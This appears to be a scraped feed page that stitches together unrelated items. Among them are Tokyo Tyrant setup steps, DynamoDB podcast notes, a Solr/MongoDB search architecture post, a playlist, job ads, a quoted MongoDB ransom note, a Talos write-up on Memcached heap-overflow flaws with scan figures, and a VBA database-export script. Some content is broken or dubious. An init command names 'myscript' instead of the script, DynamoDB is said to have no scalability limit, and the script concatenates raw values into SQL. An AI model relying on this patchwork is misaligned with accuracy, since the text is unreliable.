You should see something like the following:


2009-07-15T09:57:06-06:00       SYSTEM  --------- logging started [5469] -------- 2009-07-15T09:57:06-06:00       SYSTEM  server configuration: host=(any) port=1978 2009-07-15T09:57:06-06:00       SYSTEM  opening the database: * 2009-07-15T09:57:06-06:00       SYSTEM  service started: 5469 2009-07-15T09:57:06-06:00       INFO    timer thread 1 started 2009-07-15T09:57:06-06:00       INFO    worker thread 1 started 2009-07-15T09:57:06-06:00       INFO    worker thread 2 started 2009-07-15T09:57:06-06:00       INFO    worker thread 3 started 2009-07-15T09:57:06-06:00       INFO    worker thread 4 started 2009-07-15T09:57:06-06:00       INFO    worker thread 5 started 2009-07-15T09:57:06-06:00       INFO    worker thread 6 started 2009-07-15T09:57:06-06:00       INFO    worker thread 7 started 2009-07-15T09:57:06-06:00       INFO    worker thread 8 started 2009-07-15T09:57:06-06:00       SYSTEM  listening started

To end the server, simply press Ctrl-C.

Of course, chances are you want the Tyrant server to start on bootup. To do this, we copy the ttservctl script to the /etc/init.d/ directory, make it executable and tell Ubuntu to start it at boot time:


$ cp /usr/local/sbin/ttservctl /etc/init.d $ chmod +x /etc/init.d/ttservctl $ update-rc.d myscript start 51 S .

Don’t forget the dot at the end of that last line.

You can now also use /etc/init.d/ttservctl/ to stop, start and restart the service.

Start the server:


/etc/init.d/ttservctl start

Stop the server:


/etc/init.d/ttservctl stop

Restart the server:


/etc/init.d/ttservctl restart

Now that you have it installed, you can connect to it and use it with one of the available language bindings. Currently there are Ruby, Python, Perl and Java interfaces available. See the Tokyo Cabinet page for more details on using those.

References


          RR 314 DynamoDB on Rails with Chandan Jhunjhunwal        

RR 314 DynamoDB on Rails with Chandan Jhunjhunwal

Today's Ruby Rogues podcast features DynamoDB on Rails with Chandan Jhunjhunwal. DynamoDB is a NoSQL database that helps your team solve managing infrastructure issues like setup, costing and maintenance. Take some time to listen and know more about DynamoDB!

[00:02:18] – Introduction to Chandan Jhunjhunwal

Chanchan Jhunjhunwal is an owner of Faodail Technology, which is currently helping many startups for their web and mobile applications. They started from IBM, designing and building scalable mobile and web applications. He mainly worked on C++ and DB2 and later on, worked primarily on Ruby on Rails.

Questions for Chandan

[00:04:05] – Introduction to DynamoDB on Rails

I would say that majority of developers work in PostgreSQL, MySQL or other relational database. On the other hand, Ruby on Rails is picked up by many startup or founder for actually implementing their ideas and bringing them to scalable products. I would say that more than 80% of developers are mostly working on RDBMS databases. For the remaining 20%, their applications need to capture large amounts of data so they go with NoSQL.

In NoSQL, there are plenty of options like MongoDB, Cassandra, or DynamoDB. When using AWS, there’s no provided MongoDB. With Cassandra, it requires a lot of infrastructure setup and costing, and you’ll have to have a team which is kind of maintaining it on a day to day basis. So DynamoDB takes all those pain out of your team and you no longer have to focus on managing the infrastructure.

[00:07:35] – Is it a good idea to start with a regular SQL database and then, switch to NoSQL database or is it better to start with NoSQL database from day one?

It depends on a couple of factors. For many of the applications, they start with RDBMS because they just want to get some access, and probably switch to something like NoSQL. First, you have to watch the incoming data and their capacity. Second is familiarity because most of the developers are more familiar with RDBMS and SQL queries.

For example, you have a feed application, or a messaging application, where you know that there will be a lot of chat happening and you’d expect that you’re going to take a huge number of users. You can accommodate that in RDBMS but I would probably not recommend that.

[00:09:30] Can I use DynamoDB as a caching mechanism or cache store?

I would not say replacement, exactly. On those segments where I could see that there’s a lot of activity happening, I plugged in DynamoDB. The remaining part of the application was handled by RDBMS. In many applications, what I’ve seen is that they have used a combination of them.

[00:13:05] How do you decide if you actually want to use DynamoDB for all the data in your system?

The place where we say that this application is going to be picked from day one is where the number of data which will be coming will increase. It also depends on the development team that you have if they’re familiar with DynamoDB, or any other NoSQL databases.

[00:14:50] Is DynamoDB has document store or do you have of columns?

You can say key value pairs or document stores. The terminologies are just different and the way you design the database. In DynamoDB, you have something like hash key and range key.

[00:22:10] – Why don’t we store images in the database?

I would say that there are better places to store the, which is faster and cheaper. There are better storage like CDN or S3.

Another good reason is that if you want to fetch a proper size of image based on the user devices screen, resizing and all of the stuff inside the database could be cumbersome. You’ll repeat adding different columns where we’ll be storing those different sizes of images.

[00:24:40] – Is there a potentially good reason for NoSQL database as your default go-to data store?

If you have some data, which is complete unstructured, if you try to store back in RDBMS, it will be a pain. If we talk about the kind of media which gets generated in our day to day life, if you try to model them in a relational database, it will be pretty painful and eventually, there will be a time when you don’t know how to create correlations.

[00:28:30] – Horizontally scalable versus vertically scalable

In vertically scalable, when someone posts, we keep adding that at the same table. As we add data to the table, the database size increases (number of rows increases). But in horizontally scalable, we keep different boxes connected via Hadoop or Elastic MapReduce which will process the added data.

[00:30:20] – What does it take to hook up a DynamoDB instance to a Rails app?

We could integrate DynamoDB by using the SDK provided by AWS. I provided steps which I’ve outlined in the blog - how to create different kinds of tables, how to create those indexes, how to create the throughput, etc. We could configure AWS SDK, add the required credential, then we could create different kinds of tables.

[00:33:00] – In terms of scaling, what is the limit for something like PostgreSQL or MySQL, versus DynamoDB?

There’s no scalability limit in DynamoDB, or any other NoSQL solutions.

Picks

David Kimura            

  • CorgUI

Jason Swett     

  • Database Design for Mere Mortals

Charles Maxwood

  • VMWare Workstation
  • GoCD
  • Ruby Rogues Parley
  • Ruby Dev Summit

Chandan Jhunjhunwal     

  • Twitter @ChandanJ
  • chandan@faodailtechnology.com

          LetoDB rdd cliente servidor para xHarbour        
Desde la soleada Mallorca leemos una muy interesante nota de BielSys (Gabriel Maimó "Biel") acerca de un proyecto Open Source de Alexander Kresin.

http://bielsys.blogspot.com/2008/07/letodb-rdd-cliente-servidor-para.html

Gracias BielSys, muy interesante tu blog.
          Under the Hood: Architectural Overview of Netmera Search        
One of the most important features of Netmera Platform is full-text search. This feature really stands out from other Backend Cloud services, in that you can offer unstructured data very efficiently in your app via Netmera. With Netmera Search our backend services are particularly useful for media and content based applications.

In this post, I will talk about the search feature of Netmera and technologies that we use to develop it.

Netmera stores data on the Nosql database MongoDB which offers scalable, high-performance, schema free data storage. MongoDB provides reliable data store and fast query . It also provides several useful querying options, however, it has limited search functionality. You can’t create MongoDB index that will allow searching on each field efficiently. Indexing all fields causes memory problems. Due to limited search feature of MongoDB, we decided to use a search engine for this purpose. We analyzed search engines and decided to use Solr because of its maturity and large community behind it.

Solr is an open source search platform which is based on Lucene search engine. It provides full-text search, facet search, analyzing/stemming/boosting contents and some other useful features. It can perform complex queries, can handle millions of documents and can scale horizontally. Since Solr has opportunity to store data and retrieve it during search, we decided to store content in Solr instead of MongoDB. However we observe that query performance of Solr decreases when index size increases. We realized that the best solution is to use both Solr and Mongo DB together. Then, we integrate Solr with MongoDB by storing contents into the MongoDB and creating index using Solr for full-text search. We only store the unique id for each document in Solr index and retrieve actual content from MongoDB after searching on Solr. Getting documents from MongoDB is faster than Solr because there is no analyzers, scoring etc. With this hybrid approach we get the benefits of both technologies.

Netmera search is composed of three layers described below.

1. Content Indexing
While adding content into cloud, it is also added to the search index. Before text (meta data of media or the text content itself) gets indexed, it is tokenized and analyzed. For this purpose, we have developed our FilterFactory in order to analyze Turkish data. Solr has a built-in stemmer but  it doesn’t provide precise results for Turkish language. We use Zemberek which is an open source Natural Language Processing library for Turkic languages for stemming terms. With this process we achieve more accurate search results. We also create stop word list (common words used in the language) for the Turkish language and remove those words from the document during indexing. This process improves the indexing time.

At the moment we have extended Solr for Turkish language but we have plans to optimize our search engine for other languages. We would like to hear your recommendations to add additional libraries for other languages. You can tell us available language extensions in the comments.

2. Searching
This layer provides the capabilities of searching contents inside the search index. Besides full-text search, Netmera is also able to do geo-location search. In order to make location search, latitude and longitude values are indexed for all location related content. Then our search engine can perform two kinds of geo-location searches as described below;

Box Search : Given two corner points, box is created and contents inside the box are listed. This feature can be used on a map in order to find locations or contents inside a map area.

Circle Search : Given a point (latitude, longitude) and distance (radius of the circle), a circle is created and contents inside this circle are listed. This search method can best be used to find nearby contents around a user.

3. Ranking
Contents retrieved from the search index are ranked by the Lucene’s scoring algorithm. This is a complex algorithm but in general it is based on the frequency of search term in individual documents and in overall index. Our current R&D efforts are focused on customizing search scores (ranking) by adding new factors such as social context, popularity, location etc. to the search. In this way different type of applications will be able to find and show most relevant content to their users. We are still working on this feature and will publish a detailed blog post when it is released.

This is a general overview of our search feature. Feel free to contact me for any questions and feedback.

          SEO - Chiude per sempre oknotizie.virgilio.it ecco le 10 migliori alternative per aumentare il traffico ai siti d'informazione (filippodb)        
filippodb scrive nella categoria SEO che: OKNOtizie rappresentava un\'ottima piattaforma per verificare le informazioni lasciando poco spazio alla pubblicazione di notizie false che venivano etichettate dalla maggior parte dei visitat
vai agli ultimi aggiornamenti su: oknotizie diggita social bookmarking editoria sociale giornalismo partecipativo
3 Voti

Vai all'articolo completo » .Chiude per sempre oknotizie.virgilio.it ecco le 10 migliori alternative per aumentare il traffico ai siti d'informazione.
Chiude per sempre oknotizie.virgilio.it ecco le 10 migliori alternative per aumentare il traffico ai siti d
          Robomongo        
Robomongo is a native GUI client for MongoDB. So far I’ve used RockMongo, which was perfect for me, but it’s PHP-based and quite hard to install. Also, it seems to be abandoned, the last commit was in 2015. It’s a pity… Robomongo is simple. Just download, decompress, and launch. It’s free and multi-platform.Filed under: mongodb […]
          Restless Mornings 06-06-2015 with Desdemona Finch        
Playlist:

Big Mama Thornton- Unlucky Girl - In Europe
Dirty Dozen Brass Band- What You Want - New Orleans Funk 3
Kuf Knotz- Inertia - A Positive Light
Opium Jukebox- Anarchy In The UK - Never Mind The Bhangra Heres The Opium Jukebox
Gangstagrass- John Henry feat Soul Khan Dan Whitener - American Music
Dwight Yoakam- Man Of Constant Sorrow - Second Hand Heart
The Hot Sardines- Your Feets Too Big - The Hot Sardines
Bobby Bland- I Pity The Fool - Mojo Presents DavdHeroesBowie
- voicebreak -
Dom La Nena- Menino - Soyo
Decker- ODB - Patsy
Flavia Coelho- Por Cima - Mundo Meu
Compilation- Partido Alto - Putumayo Presents Brazilian Beat
Kacey Musgraves- Stupid - Same Trailer Different Park
Brandi Carlile- Alibi - The Firewatchers Daughter
Pokey LaFarge- Something In The Water - Something In The Water
Shakey Graves- Hard Wired - And The War Came
Sun Ra- Trying To Put The Blame On Me Live In Rome 1977 - Marshall Allen Presents Sun Ra And His Arkestra In The Orbit Of Ra
Gangstagrass- Wade In The Water feat Liquid Dolio The Sleuth Samantha Martin Delta Sugar - American Music
Robert Earl Keen- Walls Of Time - Happy Prisoner The Bluegrass Sessions Deluxe Edition
Hard Working Americans- Come From The Heart with Rosanne Cash - The First Waltz
- voicebreak -
Buddy Miller- Dont Wait - Universal United House Of Prayer
Steve Earle The Dukes- Babys Just As Mean As Me feat Eleanor Whitmore - Terraplane
Del And Dawg- Im Sitting On Top Of The WOrld - Hardcore Bluegrass In The Dawg House
Alison Brown- Lorelei - Replay
- voicebreak -
Hot Club Of Cowtown- The Devil Aint Lazy - What Makes Bob Holler
Captain Planet- Tudo De Bom feat Samira Winter Nevilton - Esperanto Slang
Abelardo Barroso- Macorina with Orquesta Sensacin - Cha Cha Cha with Orquesta Sensacin
King Tuff- Beautiful Thing - Black Moon Spell
Deerhoof- Exit Only - La Isla Bonita
Sallie Ford- Workin The Job - Slap Back
Django Django- Shake Tremble - Born Under Saturn
Snake Rattle Rattle Snake- Hiding In The Pale Walls - Totem
Iron Wine- Kingdom Of Animals - Boy With A Coin
Giant Sand- Hurtin Habit - Heartbreak Pass
Got A Girl- Ill Never Hold You Back - I Love You But I Must Drive Off This Cliff Now
They Might Be Giants- Erase - Glean
Andrew Bird- Drunk By Noon - Things Are Really Great Here Sort Of
Speedy Ortiz- Dot X - Foil Deer
Ambrosia Parsley- Rubble - Weeping Cherry
- voicebreak -
Prinze George- Upswing - Prinze George EP
Panda Bear- Sequential Circuits - Panda Bear Meets The Grim Reaper
John Statz- Tulsa - Tulsa
Gemma Ray- Buckle Up - Milk For Your Motors
- voicebreak -
Panda Bear- Sequential Circuits - Panda Bear Meets The Grim Reaper
Gemma Ray- Buckle Up - Milk For Your Motors
Horse Feathers- Violently Wild - So It Is With Us


playlist URL: http://www.afterfm.com/index.cfm/fuseaction/playlist.listing/showInstanceID/77/playlistDate/2015-06-06
          When to use MongoDB or another document oriented database system?        
We are building a platform for comparing websites on a detailed level. We are using MongoDB to store all the information and it works quite nicely. We use it to store all meta-information of the domains, because MongoDB better fits the requirements. For example: We retrieve different kind of data for every domain so I […]
          Lessons learned for large MongoDB databases        
We are currently developing a system which wants to analyze all the domains in the internet. This is a really challenging task and not easily done in a few months time. Besides loads of problems, like finding so many domains and parsing them in a reasonable amount of time we also implement a MongoDB cluster […]
          Recent work with RelStorage        
Originally posted on Chatterbox, Reloaded:
The KARL project has been focused in the last year on some performance and scalability issues. It’s a reasonably big database, ZODB-atop-RelStorage-atop-PostgreSQL. It’s also heavily security-centric with decent writes, so CDNs and other page caching wasn’t going to help. I personally re-learned the ZODB lesson that the objects needed for…
          [CouchDB-dev] It’s been a great ride. Today I’m moving to MongoDB (Jan Lehnardt)        
Dear Apache CouchDB Community: as of today, I’m stepping down from all offices at the ASF: I’ll step down as Vice President of Apache CouchDB and Apache CouchDB PMC Chair and I’ll resign from the ... -- Jan Lehnardt
          Devops Engineer (Remote or Local) - ICON Health & Fitness, Inc. - Logan, UT        
Experience with MongoDB. Manage and query SQL and MongoDB databases. Remote and/or On-Site....
From ICON Health & Fitness, Inc. - Fri, 09 Jun 2017 00:38:28 GMT - View all Logan, UT jobs
          Javascript Full Stack Developer (Remote or On-site) - ICON Health & Fitness, Inc. - Logan, UT        
Optimize our recommendation engines with aggregate MongoDB queries. IFit's focus is to connect everybody to everything fitness....
From ICON Health & Fitness, Inc. - Wed, 17 May 2017 07:12:02 GMT - View all Logan, UT jobs
          Database Architect - Apple - Santa Clara Valley, CA        
MongoDB, CouchBase, Cassandra. Experience with NOSQL such as MongoDB cassandra or CouchBase. At Apple, we are looking for a passionate Data Services Engineer to...
From Apple - Tue, 01 Aug 2017 13:22:46 GMT - View all Santa Clara Valley, CA jobs
          Senior Oracle DBA for Internet Services - Apple - Santa Clara Valley, CA        
Experience on any of NoSQL data store such as Voldemort, MongoDB and Couchbase. Do you like the idea of running global services that are used by millions of...
From Apple - Tue, 01 Aug 2017 13:22:44 GMT - View all Santa Clara Valley, CA jobs
          Sr. Database Engineer - Apple - Santa Clara Valley, CA        
Production support experience with MongoDB or Vertica. Database engineer will be part of Data services team providing database design, development and...
From Apple - Mon, 10 Jul 2017 13:03:23 GMT - View all Santa Clara Valley, CA jobs
          Sr. Software Engineer, Core Services, Apple Media Products - Apple - Santa Clara Valley, CA        
Experience with one or more of the NoSQL solutions (Memcached / Redis / Voldemort / Cassandra / MongoDB etc.)....
From Apple - Tue, 27 Jun 2017 12:48:45 GMT - View all Santa Clara Valley, CA jobs
          Sr. Software Engineer - Platforms - Apple - Santa Clara Valley, CA        
Oracle, Cassandra and MongoDB experience highly desirable. Imagine what you could do here....
From Apple - Thu, 15 Jun 2017 12:37:13 GMT - View all Santa Clara Valley, CA jobs
          Ali zgodbe prodajajo / ali dobre zgodbe preživijo        
Uspeh boste lahko dosegli le, če boste imeli zgodbo. Brez zgodb se nič ne prodaja. Zgodbe prodajajo. Samo par stavkov, ki jih posluÅ¡am znova in znova zadnja leta. Zgodbe so tiste, ki prodajajo. Zgodbe so tiste, ki navduÅ¡ijo potroÅ¡nika, da odpre denarnico in kupi nekaj, kar sploh ne potrebuje. Zgodba je tista, ki je odločilna …
          Ali zgodbe v letu 2015 res prodajajo?        
Ali zgodbe v letu 2015 res prodajajo? Pogosto sliÅ¡imo stavke, kot so: Brez zgodb se nič ne prodaja. Zgodbe so tiste, ki prodajajo. Zgodbe so tiste, ki navduÅ¡ijo potroÅ¡nika, da odpre denarnico in kupi nekaj, kar sploh ne potrebuje. Zgodba je tista, ki je odločilna na tehtnici, ko izbiraÅ¡ med dvema izdelkoma. Zgodbe se pač …
          Compare NoSQL-based AWS database options        
As more cloud databases become available to AWS customers, NoSQL services such as ElastiCache and DynamoDB offer advantages over relational databases.
          MongoDB developer - Agilitics Pte. Ltd. , Dubai, Abu Dhabi, Riyadh, Jeddah, Dammam         
MongoDB Tutorial 
===============
MongoDB course
MySql vs MongoDb
Connect to MongoDb
Insert and Query Data .
MongoDb Schema
Relational Data Browse 
Virtual Relations 
The Query Builder
Load JSON files into the database 


Introduction to MongoDB as well as instructions to Import Example Dataset;
A brief overview of the MongoDB Shell (mongo);
Basic Insert, Find, Update, Remove operations plus Aggregation;
Instructions on creating Indexes to improve query performance.

Cost:

Certified


          "Export Dbase into MYSQL (no replies)        
I just spent quite a bit of time creating a SUB that would maintain field names and most types/formatting. This uses ADODB connections to gather and create database in mysql and loop through DBF resultset inserting values into the MYSQL database. As it is this will need modification on any date values within strVals. Works good for me so far. Heres the script

Sub ExportDBFtoMYSQL

'=================ADODB Constants==============
Const adOpenStatic = 3
Const adLockOptimistic = 3
Const adOpenKeyset = 1
Const adLockReadOnly = 1
Const adOpenForwardOnly = 0

'============MYSQL SERVER VALUES============
MYSQLSVR = "localhost"
MYSQLUSERNAME = "root"
MYSQLPWD = "mypwd"
MYSQLDB = "mrp"
MYSQLUSERNAME = "root"
MYSQLPORT = "3306"

'==================DBF VALUES=================
DBFPath = CurrentDocument.Path
DBFName = "parts"
DBFKey = "IN_HOUSE_S"

'Connect to DBF=================================
Set DBFconn=CreateObject("ADODB.Connection")
Set DBFRS = CreateObject("ADODB.Recordset")
DBFconn.Open "Driver={Microsoft dBASE Driver (*.dbf)};DriverID=277;Dbq=" & DBFPath
DBFstrSQL = "SELECT * FROM " & DBFName
DBFRS.Open DBFstrSQL,DBFconn, 0,3

'BUILD MYSQL Col String==============================
i = 0
Do Until i = DBFRS.Fields.Count
If DBFRS.Fields(i).Type = 2 Then
StrCol = StrCol & DBFRS.Fields(i).Name &" SMALLINT(" & DBFRS.Fields(i).DefinedSize & ") DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
If DBFRS.Fields(i).Type = 5 Then
StrCol = StrCol & DBFRS.Fields(i).Name &" Numeric(10,4) DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
If DBFRS.Fields(i).Type = 200 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " VARCHAR(" & DBFRS.Fields(i).DefinedSize & ") DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
If DBFRS.Fields(i).Type = 11 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " BIT(1) DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
If DBFRS.Fields(i).Type = 133 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " DATE DEFAULT NULL, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
If DBFRS.Fields(i).Type = 201 Then
StrCol = StrCol & DBFRS.Fields(i).Name & " MEDIUMTEXT, "
strRSCols = strRSCols & "`" & DBFRS.Fields(i).Name & "`" & ","
End If
i=i+1
Loop

'Fix MYSQL RSCOL string==================================================
strRSCols = Left(strRSCols,Len(strRSCols)-1) & ")"

'Connect To MYSQL====================================
Set MYSQLConn = CreateObject("ADODB.Connection")
Set MYSQLRS = CreateObject("ADODB.Recordset")
MYSQLstrSQL = "SELECT * FROM " & DBFName
StrMYSQLConn ="Driver=MySQL ODBC 5.3 ANSI Driver;" &_
"SERVER=" & MYSQLSVR &";" &_
"UID=" & MYSQLUSERNAME &";" &_
"PASSWORD=" & MYSQLPWD &";" &_
"DATABASE=" & MYSQLDB & ";" &_
"PORT=" & MYSQLPORT


MYSQLConn.Open StrMYSQLConn

'BUILD MYSQL Create Table String=====================
MYSQLStrExe = "CREATE TABLE " & DBFName & " (" & StrCol & _
"PRIMARY KEY " & DBFName & "_idx1 (" & DBFKey & ")" &_
") ENGINE=InnoDB DEFAULT CHARSET=utf8;"

'EXECUTE MYSQL Create Table====================
MYSQLconn.Execute MYSQLStrExe

'OPEN New MYSQL Table=====================
MYSQLRS.Open MYSQLstrSQL,MYSQLConn, 0,3

'Enter The Data=====================================
If DBFRS.EOF = False Then

SelInto = "INSERT IGNORE INTO " & MYSQLDB & "." & DBFName & "("
i = 0
Do Until DBFRS.EOF = True
strVals = ""
Do Until i = DBFRS.Fields.Count
strVals = strVals & |"| & DBFRS.Fields(i).Value & |"| & ","
i = i + 1
Loop
i = 0

'Print DBFRS.Fields("recid").Value
strVals = Left(strVals,Len(strVals)-1) & ")"
'Print strVals
'Print SelInto & strRSCols & " values" & "(" & strVals

MYSQLconn.Execute SelInto & strRSCols & " values" & "(" & strVals
DBFRS.MoveNext
Loop
End If

MYSQLRS.Close
Set MYSQLRS = Nothing
MYSQLConn.Close
Set MYSQLConn = Nothing

DBFRS.Close
Set DBFRS = Nothing
DBFconn.close
Set DBFconn = Nothing
End Sub
          MongoDb hacked - Upwork        
Just got the message that all my data in mongodb is gone with the message:

Your DataBase is downloaded and backed up on our secured servers. To recover your lost data:Send 0.2 BTC to our BitCoin Address and Contact us by eMail with your MongoDB server IP Address and a Proof of Payment. Any eMail without your MongoDB server IP Address and a Proof of Payment together will be ignored. You are welcome!

I am not sure if there is any way to recover it?


Posted On: August 10, 2017 21:14 UTC
Category: IT & Networking > Database Administration
Country: Netherlands
click to apply
          MongoDB 3 Succinctly        

MongoDB is one of the biggest players in the NoSQL database market, providing high performance, high availability, and automatic scaling. It’s an open-source document database written in C++ and hosted on GitHub. Zoran Maksimovic’s MongoDB 3 Succinctly touches on the most important aspects of the MongoDB database that application developers should be aware of—from installation […]

OnlineProgrammingBooks.com has a Facebook page, giving a new way to see our latest announcements and posts without leaving the comfort of your Facebook newstream. So check out facebook.com/freecomputerbooks and like us today!

Free Business and Tech Magazines and eBooks

          NoSQL: Amazon’s DynamoDB and Apache HBase Performance and Modeling notes        
The challenge that architects and developers face today is how to process large volumes of data in a timely, cost effective, and reliable manner. There are several NoSQL solutions in the market today, and choosing the right one for your … Seguir leyendo
          Memcached - A Story of Failed Patching & Vulnerable Servers        
This blog authored by Aleksandar Nikolich and David Maynor with contributions from Nick Biasini

Memcached - Not secure, Not Patched Fast Enough

 

Recently high profile vulnerabilities in systems were used to unleash several global ransomware attacks that greatly impacted organizations. These types of vulnerabilities were previously patched and could have been addressed by organizations before the attacks commenced. This is just the latest example in a long line of threats that are successful in large part because of the inability for patches to be applied in a timely and effective manner. In late 2016 Talos disclosed a series of vulnerabilities in a software platform called Memcached. After releasing the vulnerabilities Talos has been monitoring the amount of systems that were vulnerable as well as the rate at which they have been patched. This blog will give a quick overview of the vulnerabilities and discuss the unfortunate findings of the Internet wide scans that we have been conducting over the last six months.

What is Memcached?


Memcached is a high performance object caching server intended for speeding up dynamic web applications and is used by some of the most popular Internet websites. It has two versions of the protocol for storing and retrieving arbitrary data, an ASCII based one and a binary one. The binary protocol is optimized for size.

It's intended use is to be accessed by the web application servers and should never under any circumstances be exposed to an untrusted environment. Newer versions of the server include basic authentication support based on SASL which, based on our findings, is seldom used.

Audit and Vulnerabilities


In October last year, we performed a source code audit of Memcached server and identified three distinct but similar vulnerabilities. All three are in the implementation of the binary protocol. Two vulnerabilities lie in the part of the code dealing with adding and updating cached objects, while the third is in the aforementioned SASL authentication mechanism. All three vulnerabilities are due to integer overflows leading to controlled heap buffer overflows and due to the nature of the protocol can be abused for sensitive memory disclosure which can lead to straightforward and reliable exploitation.

The vendor was notified and promptly issued a patch that we have verified as sufficient. Public release of the new patched version was on October 31st. The CVE ID assigned to this vulnerability is CVE-2016-8704 and was tracked by us as TALOS-2016-0219. Quickly after the public release, major linux distributions issued updates and advisories of their own. One key thing to note is that major distributions (Ubuntu, Fedora...) backported patches without bumping up the version number of the server. References:

MongoDB attacks of January 2017


A slight detour. Sometime in late December/early January news of a widespread attack on MongoDB servers surfaced.

MongoDB is a memory resident, NoSQL database. Similarly to memcached, it is never supposed to be exposed to untrusted environment, which is often overlooked by developers, and sometimes production servers end up being freely accessible over Internet.

It is a well known fact that many thousands of MongoDB servers are exposed over the Internet, but some criminal groups decided to weaponize this fact, aided by the lack of any form of authentication or access control, for profit. In a matter of days, thousands of these accessible MongoDB hosts were hit with a ransomware attack.

Essentially, the bad guys connected to the server, siphoned all the data off of it and left a note requesting certain amount of bitcoins as ransom for the data. Soon, it became apparent that multiple competing groups were attacking the same servers which leads to the conclusion that there is no hope of actually recovering data, if there ever was in the first place.

These attacks had a widespread media coverage which certainly led to higher awareness of this issue, and hopefully to less servers being exposed.

Could Memcached face a similar fate?


This whole MongoDB kerfuffle made us think about what the impact would be on a similar attack on memcached. Granted, memcached, unlike MongoDB, isn't a database, but can still contain sensitive information and disruption in the service availability would certainly lead to further disruptions on dependent services. Additionally, we could assess the potential attack surface for vulnerabilities that we found as well as see how widely the patch is applied.

So we decided to scan the Internet and see...

Scans


In order to properly get the data we needed, a special scan had to be performed. We wanted a couple of data points:

  • how many servers are directly accessible over internet
  • how many of those are still vulnerable
  • how many use authentication
  • how many of servers with authentication enabled are still vulnerable

We couldn't rely on the version reported by the server because, as mentioned before, many distributions backport security patches so the version string doesn't always reflect the patch level. Because of that, we devised a special test which would send a single packet to the server and could tell from the reply if the server was vulnerable or not.

First series of scans was conducted in late February. This first dataset lead to another scan for authentication-enabled servers specifically which was done in early March.

Results Of The Scans


Gathering all the data revealed mostly expected results. More than a 100,000 accessible servers, with almost 80% still vulnerable and only about 22% having authentication enabled. Interestingly, almost all servers with authentication enabled were still found to be vulnerable to CVE-2016-8706 which we specifically tested for. The exact numbers are as follows:

  • Total servers with valid responses: 107786
  • Total servers still vulnerable: 85121 (~79%)
  • Total servers not vulnerable: 22665 (~21%)
  • Total servers requiring authentication: 23907 (~22%)
  • Total vulnerable servers requiring authentication: 23707 (~99%)

Breakdown of numbers by country is, again, as expected:
    All servers
      1. 36937 - United States
      2. 18878 - China
      3. 5452 - United Kingdom
      4. 5314 - France
      5. 3901 - Russia
      6. 3698 - Germany
      7. 3607 - Japan
      8. 3464 - India
      9. 3287 - Netherlands
      10. 2443 - Canada
        Vulnerable servers
          1. 29660 - United States
          2. 16917 - China
          3. 4713 - United Kingdom
          4. 3209 - France
          5. 3047 - Germany
          6. 3003 - Japan
          7. 2556 - Netherlands
          8. 2460 - India
          9. 2266 - Russia
          10. 1820 - Hong Kong

          There are a couple of conclusions that can be drawn from this. First, there is a large number of easily accessible memcached servers on the Internet. Second, less than a quarter have authentication enabled, making the rest fully open to abuse even in the absence of exploitable remote code execution vulnerabilities. Third, people are slow to patch their existing servers, which leads to a large number of servers in risk of potential full compromise through vulnerabilities we reported. And fourth, a negligible number of servers with authentication enabled are also patched, leading to the conclusion that system administrators think authentication is enough and patches don't warrant updating. All four of these points are bad.

          Notifications

           

          After the scans were completed and conclusions were drawn, we made queries for all IP addresses to get contact emails for responsible organizations in order to send a notification with a simple explanation and suggestions to remedy this issue. This resulted in about 31 thousand unique emails which are pending notifications.

          Redoing scans


          After notifications were sent, we repeated the scans six months later to see if the notifications had any significant impact. Overall the results were disappointing, it appears the notifications largely fell on deaf ears. As you can see below only a small percentage, ~10%, of systems were patched. Additionally, there is still a significant amount of servers that are vulnerable and still do not require authentication. Whats even more disturbing is that it appears that 26% of the servers that were originally found are no longer online, but the amount of systems that we found remained largely the same. This implies that either the systems just changed IP addresses or there are still a large amount of new systems being deployed with the vulnerable version of Memcached.

          Results: 6 Months Later


          Total servers with valid responses: 106001

          Total servers still vulnerable: 73403 (~69%)

          Total servers not vulnerable: 32598 (~30%)

          Total servers requiring authentication: 18173 (~17%)

          Total vulnerable servers requiring authentication: 18012 (~99%)

          Results: Original Servers (107,786) Updated Results


          Total: 85,121

          Still vulnerable: 53,621

          No longer vulnerable: 2,958

          Not online: 28,542 (~26%)

          Conclusion


          The severity of these types of vulnerabilities cannot be overstated. These vulnerabilities potentially affect a platform that is deployed across the internet by small and large enterprises alike. With the recent spate of worm attacks leveraging vulnerabilities this should be a red flag for administrators around the world. If left unaddressed the vulnerabilities could be leveraged to impact organizations globally and impact business severely. It is highly recommended that these systems be patched immediately to help mitigate the risk to organizations.


                    [实战]爬取iask 爱问问题 导入 MONGODB 数据库        
          直接上源码: https://github.com/huahuizi/Iask-crawl
                    uploadify 发送多余请求的问题        
          使用 uploadify 上传控件上传图片时,发现当uploadify.swf加载完成后会再次发送一个请求,假 […]
                    Buku: EODB Kemudahan Memulai Usaha Bagi Usaha Kecil dan Menengah        
          4Mei 2017 Buku: EODB Kemudahan Memulai Usaha Bagi Usaha Kecil dan Menengah   Bagi para pembaca yang belum bisa memperoleh versi cetak dari buku EODB Kemudahan Memulai Usaha Bagi Usaha Kecil dan Menengah, bisa mendapatkan versi softcopynya di sini. Semoga membantu para pembaca dalam berusaha.   DAFTAR ISI   STARTING A BUSINESS PERATUAN PEMERINTAH NOMOR 7 […]
                    Tech Junkie Blog: AngularJS SPA Part 5: Create a MongoDB Configuration File        
          Here are the steps: dbpath : specifies the path of the data files logpath : specifies the path of the log file verbose: specifies how verbose we want out log files to be, in this we want our log files to be very verbose we want to log everything. The settings is from v to […]
                    AWS re:Invent 2016 Video & Slide Presentation Links with Easy Index        
          As with last year, here is my quick index of all re:Invent sessions. I'll keep running the tool to fill in the index.  It usually takes Amazon a few weeks to fully upload all the videos and presentations. This year it looks like Amazon got the majority of content on Youtube and Slideshare very quick with a few Slideshares still trickling in.

          See below for how I created the index (with code):


          ALX201 - How Capital One Built a Voice-Based Banking Skill for Amazon Echo
